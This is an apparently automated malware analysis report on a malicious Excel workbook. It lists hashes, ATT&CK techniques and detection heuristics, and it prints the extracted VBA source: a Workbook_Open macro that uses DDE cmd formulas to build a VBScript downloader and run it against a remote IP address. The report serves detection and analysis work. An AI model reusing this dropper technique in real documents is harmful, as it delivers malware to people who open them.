Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d65c88b94d838ce6…

MALICIOUS

Office (OOXML)

22.6 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2019-06-27
MD5: c66857a9be0a738acfd4c5faedbe0955 SHA-1: 5a51f73549de2ae57d760e3b74a8632c13d4bc33 SHA-256: d65c88b94d838ce673a8e814edea6508a003d42debbefc47f15bce3fc8b5aef4
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The OOXML file contains a Workbook_Open VBA macro that leverages a DDE link to execute a command. This command uses 'cscript' to run a downloaded 'wget.vbs' script, which in turn downloads a file from 'http://180.148.84.85/test.txt' and saves it as 'test.txt'. This indicates a downloader or droppper functionality, aiming to fetch and execute further malicious content.

Heuristics 6

  • Spreadsheet DDE link launches a dangerous command critical OOXML_SPREADSHEET_DDE_MALICIOUS
    Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'"
    ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'"
    ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Private Sub Workbook_Open()
    Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://180.148.84.85/test.txt In document text (OOXML body / shared strings)
    • http:///test.txtIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2988 bytes
SHA-256: 80da8d74fcfa3746c365a0e52a5a33a192e830c0fdf876fefcc4add1fa699ecc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private Sub Workbook_Open()
Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14"
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_Open()

ActiveCell.FormulaR1C1 = "=cmd|'/C echo strUrl = WScript.Arguments.Item(0) > wget.vbs && echo StrFile = WScript.Arguments.Item(1) >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo http.Open ""GET"",strURL,False >> wget.vbs && echo http.Send >> wget.vbs && echo varByteArray = http.ResponseBody >> wget.vbs && echo Set http = Nothing >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set fs = CreateObject(""Scripting.FileSystemObject"") >> wget.vbs && echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs && echo strData = "" >> wget.vbs && echo strBuffer = "" >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs && echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs && echo Next >> wget.vbs && echo ts.Close >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C cscript wget.vbs http:///test.txt test.txt '!'A1'"
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module2"
Sub test()
Attribute test.VB_ProcData.VB_Invoke_Func = "j\n14"
s


End Sub

Attribute VB_Name = "Module3"
Sub testest()
Attribute testest.VB_ProcData.VB_Invoke_Func = " \n14"
'
' testest Macro
'

'
    Range("J18").Select
    ActiveCell.FormulaR1C1 = "asd"
    Range("K18").Select
    ActiveCell.FormulaR1C1 = "asd"
    Range("K19").Select
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 41984 bytes
SHA-256: d4d745a79c0fba985ce214a37a687b93ca88b7754d42146d23f219cd68fa5c9d